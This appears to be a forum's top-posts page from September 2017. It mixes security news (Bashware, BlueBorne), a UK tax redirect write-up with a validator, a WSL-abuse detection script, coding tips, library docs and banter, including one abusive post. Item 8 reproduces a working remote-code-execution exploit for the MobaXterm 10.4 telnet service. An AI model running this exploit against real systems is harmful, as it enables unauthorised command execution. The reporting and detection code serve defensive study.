Leaderboard

Popular Content

Showing content with the highest reputation on 09/12/17 in all areas

  1. Don't be mean, we all started somewhere.. The concept of spaghetti code refers to unorganized code that is hard to read and understand. Here are a few suggestions for getting rid of spaghetti code:
     • move the sections of code that do one specific thing into separate methods (e.g. user registration should live in a users class, alongside other methods such as login, verification and so on)
     • add comments to the code, at the start of each class, at the start of each method, and inside methods wherever you find it useful (I can tell you for sure that after 6 months you won't understand what's in there anymore, regardless of whether you wrote the script yourself or not)
     • arrange the methods in the appropriate classes
     • check that variables and methods have appropriate names (e.g. for a method that checks a user's login, you don't name it haiCuTata(String[] omulAlaNebun, String[] parolaDacaSioMaiAminteste))
     • import only the classes you need; don't import all of java.* if you don't need every function in there
     • deobfuscate the code using beautify or other features of the IDE you use
     • rewrite the methods that don't make sense or that aren't optimized
    6 points
  2. 'Bashware' is a clever new type of malware that major antivirus programs can't detect.

     Microsoft surprised the technology world last year when it announced that users will be able to run native Linux applications in Windows 10 without virtualization. While this feature is meant to help developers, researchers believe it could be abused by attackers to hide malware from security products.

     Researchers from security firm Check Point Software Technologies developed a technique that uses Bash, the Linux command-line interface—or shell—that's now available in Windows, to make known malware undetectable. They named the result Bashware.

     The Windows 10 feature, called the Windows Subsystem for Linux (WSL), tricks Linux applications into believing they're communicating with the Linux kernel—the core part of the operating system that includes hardware drivers and essential services. In reality, those applications communicate with the WSL, which translates their system calls into equivalents for the Windows kernel.

     WSL was first announced in March 2016 and was added as a beta feature in the Windows 10 Anniversary Update, which was released in August 2016. Microsoft announced that it will become a fully supported feature in the upcoming Fall Creators Update.

     "WSL seems to be well designed. What allows Bashware to operate the way it does is the lack of awareness by various security vendors"

     WSL makes it easier for developers who need to write and test code both in Windows and Linux to do so without the overhead of a virtual machine. Many developers, whether they prefer Windows as their primary desktop OS or just need it for Visual Studio and other development tools, also like the simplicity of the Linux command line utilities for interacting with different programming language interpreters and component repositories.

     As it stands now, WSL is not turned on by default and users need to enable "development mode" on their systems in order to use it. However, Check Point claims that its Bashware attack automates the steps needed to silently enable WSL, download the Ubuntu-based userspace environment that comes with it, and then run malware inside.

     Linux programs executed through WSL will appear in Windows as "pico processes," a new type of process that is structurally different than those spawned by regular Windows applications. During their tests, the Check Point researchers found no security products that monitor pico processes, even though Microsoft provides a special application programming interface called the Pico API that can be used to do this.

     This apparent lack of interest by security vendors towards WSL might be the result of a widespread belief that users need to enable the feature manually and most of them won't do it because they don't have a need for it. However, according to Bashware's creators, "it's a little-known fact" that entering the developer mode can be achieved by modifying a few registry keys and this can be done silently in the background by an attacker who has the right privileges.

     A system reboot is indeed required under normal circumstances to enable WSL, but attackers could simply wait for victims to turn off their computers or could trigger a critical error to force a reboot, the Check Point researchers told me in an email. There might also be a way to load the WSL drivers manually without restarting the computer, but this method is still being investigated, they said.

     "We see it as both vital and urgent for security vendors to support this new technology in order to prevent threats such as the ones demonstrated by Bashware"

     What's interesting about Bashware is that attackers don't have to write malware programs for Linux in order to run them through WSL on Windows. Thanks to a program called Wine, they can use the technique to directly hide known Windows malware.

     In some ways, Wine is the equivalent of WSL on Linux, as it allows Linux users to run Windows programs on their systems without virtualization. The Bashware attack installs Wine inside the downloaded Ubuntu userspace environment and then launches Windows malware through it. Thanks to WSL, those malicious programs will be spawned back into Windows as pico processes, hiding them from security software.

     Check Point's Gal Elbaz and Dvir Atias are not the first security researchers to warn that attackers could abuse WSL to run malware. Reputed Windows internals expert Alex Ionescu called attention to the same risks in 2016 in talks at Black Hat USA and Microsoft's BlueHat conference. Ionescu, who is the vice president of endpoint detection and response strategy at security firm CrowdStrike, maintains a GitHub repository with his research on WSL.

     To some extent Bashware builds on Ionescu's prior findings, but the technique is adapted to the current state of WSL. It shows that one year later many security vendors are still not prepared to deal with this new technology.

     The good news is that in order to use Bashware, attackers need to already have administrator privileges on their victims' computers. This means they need to first compromise those systems using more traditional methods: phishing emails with malicious attachments, documents rigged with exploits for unpatched vulnerabilities, social engineering tricks, stolen administrative credentials and so on.

     Gaining admin rights on Windows computers is not necessarily a hard thing to do, and attackers do it all the time. However, these extra steps give security products a chance to detect and break attack chains before Bashware can be used to hide malicious payloads.

     The Check Point researchers declined to name the security products whose detection mechanisms they managed to bypass, noting that their goal is for this research to serve as a wakeup call for the entire security industry.

     WSL is not a common attack vector and if attackers were to use it as a source of attacks, they would first need to download malware onto the targeted computer, said Adam Bromwich, senior vice president of security technology and response at Symantec. "Based on this WSL architecture, Symantec's scanners, machine learning and protection technologies are designed to scan and detect malware created using WSL."

     Kaspersky Lab told me in an email it plans to modify its antivirus software to detect this type of malware in the future. Currently, all of the company's products can detect malware downloaders and other Windows-based parts of such attacks, Kaspersky Lab said.

     Antivirus firm Bitdefender did not immediately respond to a request for comment. We will update this post if we hear back.

     Update: This post has been updated with comment from Kaspersky, and has been updated to include more context about previous research in this area.

     Via vice.com
    4 points
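
Added detection example (not part of the quoted article or of Check Point's research): the staging steps the article describes happen in ordinary Windows processes before anything runs as a pico process, so they can be correlated from standard endpoint telemetry. The event fields follow Sysmon naming, the sample events are constructed, the registry value and feature names are the standard Windows ones rather than names given in the article, and the list of interactive writer processes is an assumption to tune per environment.

```python
import re
from datetime import datetime, timedelta

# Registry value behind "developer mode" and the WSL optional-feature name.
DEV_MODE_VALUE = (r"\software\microsoft\windows\currentversion"
                  r"\appmodelunlock\allowdevelopmentwithoutdevlicense")
WSL_FEATURE = "microsoft-windows-subsystem-linux"
WSL_LAUNCHERS = {"bash.exe", "wsl.exe"}
# Assumption: processes that write the value when a user flips the Settings toggle.
INTERACTIVE_WRITERS = {"systemsettings.exe", "systemsettingsadminflows.exe"}
ORDER = ["developer_mode_registry", "wsl_feature_enabled", "wine_under_wsl"]
SEVERITY = {1: "low", 2: "medium", 3: "high"}
REG_PATH = (r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion"
            r"\AppModelUnlock\AllowDevelopmentWithoutDevLicense")

# Constructed events, Sysmon-style: 13 = registry value set, 1 = process create.
SAMPLE_EVENTS = [
    {"host": "WS-014", "time": "2017-09-12T09:00:05", "event_id": 13,
     "Image": r"C:\Users\bob\AppData\Local\Temp\setup.exe",
     "TargetObject": REG_PATH, "Details": "DWORD (0x00000001)"},
    {"host": "WS-014", "time": "2017-09-12T09:00:09", "event_id": 1,
     "Image": r"C:\Windows\System32\Dism.exe",
     "CommandLine": "dism.exe /online /enable-feature "
                    "/featurename:Microsoft-Windows-Subsystem-Linux /norestart"},
    {"host": "WS-014", "time": "2017-09-13T08:41:30", "event_id": 1,
     "Image": r"C:\Windows\System32\bash.exe",
     "CommandLine": 'bash.exe -c "wine ./sample.exe"'},
    # A developer turning the feature on through Settings and PowerShell.
    {"host": "DEV-007", "time": "2017-09-12T10:15:00", "event_id": 13,
     "Image": r"C:\Windows\System32\SystemSettingsAdminFlows.exe",
     "TargetObject": REG_PATH, "Details": "DWORD (0x00000001)"},
    {"host": "DEV-007", "time": "2017-09-12T10:16:40", "event_id": 1,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "Enable-WindowsOptionalFeature -Online "
                    "-FeatureName Microsoft-Windows-Subsystem-Linux"},
    # Silent registry change only, nothing else yet.
    {"host": "WS-031", "time": "2017-09-12T11:02:17", "event_id": 13,
     "Image": r"C:\ProgramData\updater.exe",
     "TargetObject": REG_PATH, "Details": "DWORD (0x00000001)"},
]


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(ev):
    """Map one event to a staging step name, or None if it is not relevant."""
    image = basename(ev.get("Image", ""))
    if ev["event_id"] == 13:
        target = ev.get("TargetObject", "").lower()
        turned_on = re.search(r"0x0*1\)$", ev.get("Details", "").strip())
        if (target.endswith(DEV_MODE_VALUE) and turned_on
                and image not in INTERACTIVE_WRITERS):
            return "developer_mode_registry"
    elif ev["event_id"] == 1:
        cmd = ev.get("CommandLine", "").lower()
        if WSL_FEATURE in cmd and ("enable-feature" in cmd
                                   or "enable-windowsoptionalfeature" in cmd):
            return "wsl_feature_enabled"
        if image in WSL_LAUNCHERS and re.search(r"\bwine\b", cmd):
            return "wine_under_wsl"
    return None


def make_finding(host, start, chain):
    return {"host": host, "first_seen": start.isoformat(),
            "steps": list(chain), "severity": SEVERITY[len(chain)]}


def find_wsl_staging(events, window=timedelta(hours=24)):
    """Report, per host, how far the ordered staging chain got within the window."""
    by_host = {}
    for ev in events:
        step = classify(ev)
        if step:
            when = datetime.fromisoformat(ev["time"])
            by_host.setdefault(ev["host"], []).append((when, step))

    findings = []
    for host in sorted(by_host):
        chain, start = [], None
        for when, step in sorted(by_host[host]):
            if chain and when - start > window:      # stale chain: report and reset
                findings.append(make_finding(host, start, chain))
                chain = []
            if len(chain) < len(ORDER) and step == ORDER[len(chain)]:
                if not chain:
                    start = when
                chain.append(step)
        if chain:
            findings.append(make_finding(host, start, chain))
    return findings
```

The 24-hour default window allows for the reboot the article says is needed between enabling WSL and using it.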
  3. Given how stupid you are, stay the hell in Rromania and stop going elsewhere to embarrass the nation. Have you heard of biometric passports? Especially if it's the first time you enter a country, they check it with a machine. The fake ones that pass the checks cost many thousands of euros and are made only through trusted contacts, not on public forums. Mind your own business and go screw sheep on your native hills!
    2 points
  4. Eight Bluetooth-related vulnerabilities (four that are critical) affecting over 5 billion Android, Windows and Linux devices could allow attackers to take control of devices, access corporate data and networks, and easily spread malware to other devices. Nearly all devices with Bluetooth capabilities, including smartphones, TVs, laptops, watches, smart TVs, and even some automobile audio systems, are vulnerable to this attack.

     If exploited, the vulnerabilities could enable an attacker to take over devices, spread malware, or establish a "man-in-the-middle" to gain access to critical data and networks without user interaction. The vulnerabilities were found in the Bluetooth implementations in Android, Microsoft, Linux and iOS versions pre-iOS 10. Armis reported the vulnerabilities to Google, Microsoft, and the Linux community. Google and Microsoft are releasing updates and patches on Tuesday, September 12. Others are preparing patches that are in various stages of being released.

     These vulnerabilities are the most serious Bluetooth vulnerabilities identified to date. Previously identified flaws found in Bluetooth were primarily at the protocol level. These new vulnerabilities are at the implementation level, bypassing the various authentication mechanisms, and enabling a complete takeover of the target device.

     These proximity-based network vulnerabilities could allow attackers to create broad malware infections that could spread from one infected device to many others by wirelessly connecting to other devices over Bluetooth. The device-to-device connectivity nature of Bluetooth means an airborne (or "BlueBorne") attack could easily spread without any action required by a user.

     "These silent attacks are invisible to traditional security controls and procedures. Companies don't monitor these types of device-to-device connections in their environment, so they can't see these attacks or stop them," said Yevgeny Dibrov, CEO of Armis. "The research illustrates the types of threats facing us in this new connected age."

     There are two specific methods attackers could use with exploit code. They could:
     • Connect to the target device in an undetected manner, then remotely execute code on that device. This would allow the attacker to take full control of a system, up to and including leveraging the device to gain access to corporate networks, systems, and data.
     • Conduct a Man-in-the-Middle attack — effectively creating a Bluetooth Pineapple — to sniff traffic being sent between Bluetooth-enabled devices or spoof a legitimate Bluetooth device and hijack the connection and redirect traffic. This would enable attackers to download malware to devices and take complete control of them. This attack would not require additional hardware, as it uses the Bluetooth connection on the device against the device itself.

     The automatic connectivity of Bluetooth, combined with the fact that nearly all devices have Bluetooth enabled by default, makes these vulnerabilities all the more serious and pervasive. Once a device is infected with malware, it can then easily broadcast the malware to other Bluetooth-enabled devices in its vicinity, either inside an office or in more public locations.

     While waiting for the patch, users can disable Bluetooth to protect devices.

     Source: http://www.prnewswire.com/news-releases/armis-identifies-new-airborne-cyber-threat-blueborne-that-exposes-almost-every-device-to-remote-attack-30051700.html
    2 points
  5. WonderFox, together with its partners, has organized a big promotion in which no fewer than 9 licensed programs are offered for FREE. The programs on offer are worth $500 and are the following titles:
     • WonderFox DVD Ripper Pro 9.0
     • Ashampoo Photo Commander 14
     • Zoom Player MAX
     • AllMyNotes Organizer
     • CrazyTalk Animator 2 Standard
     • Wise Driver Care
     • PDF to X + WinExt Pro Bundle
     • WinSysClean X7
     • Watermark Software

     The promotional page can be found here: http://www.videoconverterfactory.com/back-to-school/

     To access the promotion, visit this promotional page and scroll down the page to choose the program you want. Promotion valid 04 September–30 September 2017.
    1 point
  6. It seems you aren't paying attention: what you want to do (regardless of whether the aim is to get an interview/job or it is part of a prank) is called document forgery and it is illegal https://www.avocatnet.ro/forum/discutie_200724/care-este-pedeapsa-pentru-fals-in-acte.html If you feel like ending up in prison that's your business, but what makes you think any of us here want to be your cellmates?
    1 point
  7. You'd be surprised...
    1 point
  8. Author: sultan albalawi | Category: remote exploits | Platform: windows
     Date add: 12-09-2017 | Risk: [Security Risk Critical] | 0day-ID: 0day-ID-28494

     ```python
     import telnetlib,sys
     # Exploit Title: MobaXtrem 10.4 Remote Code Execution
     # Date: 11/9/2017
     # Exploit Author: Sultan Albalawi
     # Vendor Homepage: http://mobatek.net
     # Software Link: http://download.mobatek.net/10420170816103227/MobaXterm_Portable_v10.4.zip
     # Version: 10.4
     # Tested on: Windows Xp & Windows 7 & 10
     # POC : https://www.youtube.com/watch?v=oYdzP0umtFA&feature=youtu.be
     # Vulnerability Cause:::
     # Telnet service doesn't authenticate for remote connection which allows attacker to
     # pass malicious commands over victim box through protocol.

     def get_set(HOST,cmd):
         try :
             tn = telnetlib.Telnet(HOST)
             bg="\x63\x79\x67\x73\x74\x61\x72\x74"
             tn.write(bg+" ./"+cmd+"\n")
             tn.write(main())
             tn.read_all()
         except KeyboardInterrupt:
             print "[-] Execution stopped ... keyboard interrupt raised"
         except Exception as e:
             pass

     def main():
         if len(sys.argv)==2:
             HOST = sys.argv[1]
             cmd = str(raw_input("cmd> "))
             if "exit" in cmd :
                 sys.exit("exiting...")
             else:
                 print"Executing => %s"%cmd
                 get_set(HOST,cmd)
         else:
             print "Usage: ./"+sys.argv[0]+" <target_ip>"

     if __name__ == '__main__':
         main()

     # 0day.today [2017-09-12]
     # Source: http://0day.today/exploit/28494
     ```
    1 point
  9. As I am now an adult, I sometimes need to look at taxes. The longstanding tradition of adults dictates that I must look at my taxes and say to my fellow adults “wow, I wish I had that money which is spent on single payer universal healthcare, infrastructure and education so I could spend it on video games, hardware I never use and thousands of tiny 3D printed statues of myself.”.

     Regardless, I didn’t expect my micro-sojourn into responsibility to result in a somewhat bad security issue followed by the ability to arbitrarily modify people’s tax details after making them click a link, followed by a 2 month journey to getting confirmed fixes. Welcome to my 3 step guide to hacking the uk tax system, I guess.

     The UK tax system login process is neat, and well thought out. One goes through an interstitial login web form which requests an identification number, a password, and a code texted to your cellular mobile device. On the technical side of things, this is achieved by the common redirect forwarding pattern in which the page that required login hands off to the login page with a note in parameter form saying where to send the user back to when the login process is successfully completed and you’re ready to dive into taxes and such.

     Source: https://medium.com/@Zemnmez/how-to-hack-the-uk-tax-system-i-guess-3e84b70f8b
    1 point
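
Added example, not from the quoted article: in the hand-off pattern described above, the "where to send the user back to" parameter arrives from the browser, so the login page has to validate it before redirecting. This sketch shows one way to do that check; the host names, default path and the parameter name `continue` are hypothetical.

```python
from urllib.parse import parse_qs, urlsplit

# Hypothetical site layout: these hosts, the default page and the parameter
# name "continue" are assumptions made for the example.
ALLOWED_HOSTS = {"www.tax.example", "account.tax.example"}
DEFAULT_TARGET = "/account/home"


def safe_return_target(raw, allowed_hosts=ALLOWED_HOSTS, default=DEFAULT_TARGET):
    """Return raw if it is a safe post-login destination, else the default."""
    if not raw or len(raw) > 2048:
        return default
    # Browsers drop tabs/newlines and read "\" as "/", so "/\host" can leave
    # the site. Reject such input instead of trying to normalise it.
    if "\\" in raw or any(ord(c) <= 0x20 or ord(c) == 0x7F for c in raw):
        return default
    try:
        parts = urlsplit(raw)
        port = parts.port          # raises ValueError on a malformed port
    except ValueError:
        return default

    if not parts.scheme and not parts.netloc:
        # Relative reference: only an absolute path on this site is accepted.
        # "//host/path" and "///host" are scheme-relative forms, not paths.
        return raw if raw.startswith("/") and not raw.startswith("//") else default

    # Absolute URL: https only, which also rules out javascript: and data:.
    if parts.scheme != "https" or port not in (None, 443):
        return default
    # hostname excludes userinfo, so "https://www.tax.example@other.example/"
    # is judged by its real host; URLs carrying userinfo are refused outright.
    if parts.username is not None or parts.password is not None:
        return default
    return raw if (parts.hostname or "").lower() in allowed_hosts else default


def post_login_location(query_string, param="continue"):
    """Pick the Location header value for the redirect after a successful login."""
    values = parse_qs(query_string, keep_blank_values=True).get(param, [])
    # A repeated parameter can be read differently by a proxy and the app.
    if len(values) != 1:
        return DEFAULT_TARGET
    return safe_return_target(values[0])
```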
  10. @Dragos, he won't make it by crawling. Let him first learn to walk, preferably without help.
    1 point
  11. I don't think so, I really didn't know, wtf
    1 point
  12. https://play.google.com/store/apps/details?id=com.webzen.muorigin.global.google&hl=ro He already did. Good luck.
    1 point
  13. 1 point
  14. How do you know you're dealing with spaghetti code if you don't know what spaghetti code looks like?!
    1 point
  15. <♫/> Rythm.js - v2.1.1 - A javascript library that makes your page dance.

      Demo at: https://okazari.github.io/Rythm.js/

      Getting started

      Install with npm

      ```
      npm install rythm.js
      ```

      CDN:
      https://unpkg.com/rythm.js/
      https://cdnjs.cloudflare.com/ajax/libs/rythm.js/2.x.x/rythm.min.js

      Good old way

      Import rythm into your page

      ```html
      <script type="text/javascript" src="/path/to/rythm.min.js"></script>
      ```

      Add one of the rythm css classes to indicate which element will dance.

      ```html
      <div class="rythm-bass"></div>
      ```

      Create a Rythm object and give it your audio url then use the start function.

      ```javascript
      var rythm = new Rythm();
      rythm.setMusic("path/to/sample.mp3");
      rythm.start();
      ```

      ES6 module

      ```javascript
      import Rythm from 'rythm.js'
      const rythm = new Rythm();
      rythm.setMusic("path/to/sample.mp3");
      rythm.start();
      ```

      API Documentation

      Rythm object

      ```javascript
      var rythm = new Rythm();

      /* The starting scale is the minimum scale your elements will take (Scale ratio is startingScale + (pulseRatio * currentPulse));
       * Value in percentage between 0-1
       * Default 0.75
       */
      rythm.startingScale = value;

      /* The pulse ratio is the maximum additional scale your element will take (Scale ratio is startingScale + (pulseRatio * currentPulse))
       * Value in percentage between 0-1
       * Default 0.30
       */
      rythm.pulseRatio = value;

      /* The max value history represents the number of past values that will be stored to evaluate the current pulse.
       * Int value, minimum 1
       * Default 100
       */
      rythm.maxValueHistory = value;

      /* Set the music the page will dance to.
       * @audioUrl : '../example/mysong.mp3'
       */
      rythm.setMusic(audioUrl);

      /* Used to collaborate with other players library
       * You can connect Rythm to an audioElement, and then control the audio with your other player
       */
      rythm.connectExternalAudioElement(audioElement)

      /* Adjust music's gain.
       * @value : Number
       */
      rythm.setGain(value);

      /* Add your own rythm-class
       * @elementClass: Class that you want to link your rythm to.
       * @danceType : Use any of the built-in effects or give your own function;
       * @startValue: The starting frequency of your rythm.
       * @nbValue: The number of frequencies of your rythm.
       * 1024 frequencies, your rythm will react to the average of your selected frequencies.
       * Examples : bass 0-10 ; medium 150-40 ; high 500-100
       */
      rythm.addRythm(elementClass, danceType, startValue, nbValue);

      /* Plug your computer microphone to rythm.js
       * This function returns a promise resolved when the microphone is up.
       * Requires your website to be run in HTTPS
       */
      rythm.plugMicrophone().then(function(){...})

      //Let's dance
      rythm.start();

      //Stop the party
      rythm.stop();
      ```

      Built-in classes with "pulse" effect
      • rythm-bass
      • rythm-medium
      • rythm-high

      Custom-classes

      You can use the addRythm function to make your own classes listen to specific frequencies. Here is how the basic classes are created:

      ```javascript
      addRythm('rythm-bass','pulse',0,10);
      addRythm('rythm-medium','pulse',150,40);
      addRythm('rythm-high','pulse',500,100);
      ```

      Available dance types

      For more control of these dance types, you can give a configuration object as last argument to addRythm

      ```javascript
      addRythm('rythm-high', 'shake', 500, 100, { direction:'left', min: 20, max: 300});
      ```

      Here are the built-in dances and their options
      • pulse
        min : Minimum value given to transform: scale(). Default: 0.75
        max : Maximum value given to transform: scale(). Default: 1.25
      • jump
        min : Minimum value given to transform: translateY(). Default: 0
        max : Maximum value given to transform: translateY(). Default: 30
      • shake
        min : Minimum value given to transform: translateX(). Default: -15
        max : Maximum value given to transform: translateX(). Default: 15
        direction : left for a right to left move, right for a left to right move. Default: right
      • twist
        min : Minimum value given to transform: rotate(). Default: -20
        max : Maximum value given to transform: rotate(). Default: 20
        direction : left for a right to left move, right for a left to right move. Default: right
      • vanish
        min : Minimum value (between 0 and 1) given to opacity. Default: 0
        max : Maximum value (between 0 and 1) given to opacity. Default: 1
        reverse : Boolean to reverse the effect. Default false (Higher the pulse is, the more visible it will be)
      • color
        from : Array of integers between 0 and 255 corresponding to a RGB color. Default: [0,0,0]
        to : Array of integers between 0 and 255 corresponding to a RGB color. Default: [255,255,255]

      To see each visual effect, you can go to the Demo

      Custom dance type

      If you want to use your own dance type, you can give a function as the 2nd argument of addRythm

      ```javascript
      /* The custom function signature is :
       * @elem: The HTML element target you want to apply your effect to
       * @value: The current pulse ratio (percentage between 0 and 1)
       * @options: The option object user can give as last argument of addRythm function
       */
      const pulse = (elem, value, options = {}) => {
        const max = options.max || 1.25
        const min = options.min || 0.75
        const scale = (max - min) * value
        elem.style.transform = `scale(${min + scale})`
      }

      addRythm('my-css-class', pulse, 150, 40)
      ```

      Features
      • Your HTML can dance by using any of the available dance types
      • You can use custom functions to build your own dance type (and if it looks awesome ! Feel free to make a PR )

      Contribute

      Any pull request will be appreciated. You can start coding on this project following these steps:
      • Fork the project
      • Clone your repository
      • run npm install
      • run npm start in the main folder to launch a development webserver.
      • Enjoy the rythm.

      Adding new dance type

      In v2.0.x adding a new dance type is pretty easy
      • Create a new file in src\dances
      • This file must export your custom dance type function

      For example, here is the content of jump.js file

      ```javascript
      /* The function signature is :
       * @elem: The HTML element target you want to apply your effect to
       * @value: The current pulse ratio (percentage between 0 and 1)
       * @options: The option object user can give as last argument of addRythm function
       */
      export default (elem, value, options = {}) => {
        const max = options.max || 30
        const min = options.min || 0
        const jump = (max - min) * value
        elem.style.transform = `translateY(${-jump}px)`
      }
      ```

      • Import it and register it into the constructor of Dancer.js file

      ```javascript
      import jump from './dances/jump.js'

      class Dancer {
        constructor() {
          this.registerDance('jump', jump)
        }
      }
      ```

      • Commit it and create a PR. Then look at everyone enjoying your contribution !

      Licence : GNU GPL
      Author: @OkazariBzh
      Download: Rythm.js-master.zip or git clone https://github.com/Okazari/Rythm.js.git
      Source: https://github.com/Okazari/Rythm.js
    1 point
  16. "Gandirea Laterala" (Lateral Thinking). Good book. http://www.metropolis.ro/books/book.php?product_id=1016
    1 point
  17. Yes, right now pwn is almost finished and tested by us (@SilenTx0 is still working on some tutorials). Soon you will be able to access the beta version.
    1 point